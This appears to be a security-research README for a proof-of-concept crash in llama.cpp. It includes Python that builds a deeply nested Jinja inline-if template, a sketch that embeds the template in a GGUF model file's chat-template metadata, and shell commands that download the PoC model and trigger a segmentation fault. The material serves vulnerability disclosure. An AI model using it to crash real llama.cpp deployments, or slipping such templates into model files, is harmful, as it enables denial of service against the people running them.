# PoC: Stack Overflow in llama.cpp Jinja Parser

**This is a security research proof-of-concept. Do NOT use this model for inference.**
This repository contains a minimal GGUF model file that triggers a stack overflow
(SIGSEGV) in llama.cpp's Jinja template parser, caused by unbounded recursion in
`parse_if_expression()` (`common/jinja/parser.cpp`).
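The shape of the trigger can be illustrated without the model file. Below is a sketch of how such a template might be constructed, assuming the PoC nests Jinja inline `if` expressions; the depth value is illustrative, not the one used by the actual PoC:

```python
# Sketch: build a deeply nested Jinja inline-if expression. A
# recursive-descent parser that calls parse_if_expression() once per
# nesting level consumes one stack frame per level, so a large enough
# depth exhausts the stack.
DEPTH = 100_000  # illustrative guess, not the PoC's actual depth

def nested_if_expression(depth: int) -> str:
    # depth=2 -> "{{ (0 if 1 else (0 if 1 else 0)) }}"
    return "{{ " + "(0 if 1 else " * depth + "0" + ")" * depth + " }}"

template = nested_if_expression(DEPTH)
print(len(template))  # -> 1400007
```

The string is built with repetition rather than a Python-side loop of concatenations, so generating even multi-megabyte templates is instant.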
## Reproduction
```sh
git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
cmake -B build && cmake --build build -j

# Download the PoC model
huggingface-cli download salvepilo/llama-cpp-jinja-crash-poc poc_crash_model.gguf

# Trigger the crash (no --jinja flag needed)
./build/bin/llama-cli -m poc_crash_model.gguf -p 'hello'
# Expected: Segmentation fault (exit code 139)
```
## Files
- `poc_crash_model.gguf` - Malicious GGUF with a deeply nested Jinja chat template
- `craft_full_gguf_poc.py` - Python script to regenerate the PoC file
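The regeneration script is not reproduced here, but the container side can be sketched from the GGUF v3 format: the malicious template simply lives in the `tokenizer.chat_template` metadata key. A minimal, hypothetical writer (illustrative only — a file that llama.cpp will actually load far enough to parse the template also needs architecture and tokenizer metadata, which the real script presumably provides):

```python
import struct

GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_TYPE_STRING = 8  # value-type tag for strings in GGUF v3

def gguf_string(data: bytes) -> bytes:
    # GGUF string encoding: uint64 little-endian length, then raw bytes
    return struct.pack("<Q", len(data)) + data

def write_minimal_gguf(path: str, template: str) -> None:
    """Write a GGUF file with zero tensors and one metadata key.

    Sketch only: real models carry general.architecture, tokenizer
    vocab, and tensor data in addition to the chat template.
    """
    with open(path, "wb") as f:
        f.write(GGUF_MAGIC)
        f.write(struct.pack("<I", GGUF_VERSION))
        f.write(struct.pack("<Q", 0))  # tensor count
        f.write(struct.pack("<Q", 1))  # metadata kv count
        f.write(gguf_string(b"tokenizer.chat_template"))
        f.write(struct.pack("<I", GGUF_TYPE_STRING))
        f.write(gguf_string(template.encode("utf-8")))

# Embed a deeply nested inline-if template (depth is illustrative)
write_minimal_gguf("poc_min.gguf", "{{ " + "(0 if 1 else " * 100_000 + "0" + ")" * 100_000 + " }}")
```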